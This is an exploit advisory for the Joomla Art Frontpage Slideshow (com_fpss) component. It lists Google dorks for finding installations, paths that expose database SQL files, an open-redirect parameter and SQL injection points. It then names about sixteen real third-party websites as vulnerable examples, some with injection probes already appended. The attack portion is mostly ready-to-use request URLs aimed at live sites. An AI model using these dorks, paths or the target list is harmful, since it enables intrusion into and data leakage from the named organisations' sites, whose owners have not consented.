Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

2019.01.19

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

Dork: inurl:/index.php?option=com_fpss

####################################################################################################

# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
inurl:''/administrator/components/com_fpss/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################################################

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

####################################################################################################

# Description :
*************

Art Frontpage Slideshow is a slideshow module that adds front end animation 
that attracts visitors and allows to show images of featured products 
and news in a nice eye-catching way.

####################################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql
/administrator/components/com_fpss/install.mysql.sql

# Open Redirection Exploit :
*************************

/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]

# SQL Injection Exploit :
***********************
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]
&format=feed&type=atom&lang=[SQL Injection]

/index.php?option=com_fpss&view=article&id=[ID-NUMBER]
:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]

####################################################################################################

# Example Vulnerable Sites :
*************************

[+] kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27

[+] spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27

[+] uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27

[+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql

[+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql

[+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql

[+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql

[+] fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql

[+] pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql

[+] alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql

[+] muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql

[+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql

[+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql

[+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql

[+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql

[+] marinelog.com/administrator/components/com_fpss/install.mysql.sql

####################################################################################################

# Example SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session cookie - 
headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1) 
in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423

Strict Standards: Non-static method JLoader::import() should 
not be called statically in /home/uadvirtual/public_html/main
/libraries/joomla/import.php on line 29

####################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

Dork: inurl:/index.php?option=com_fpss

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.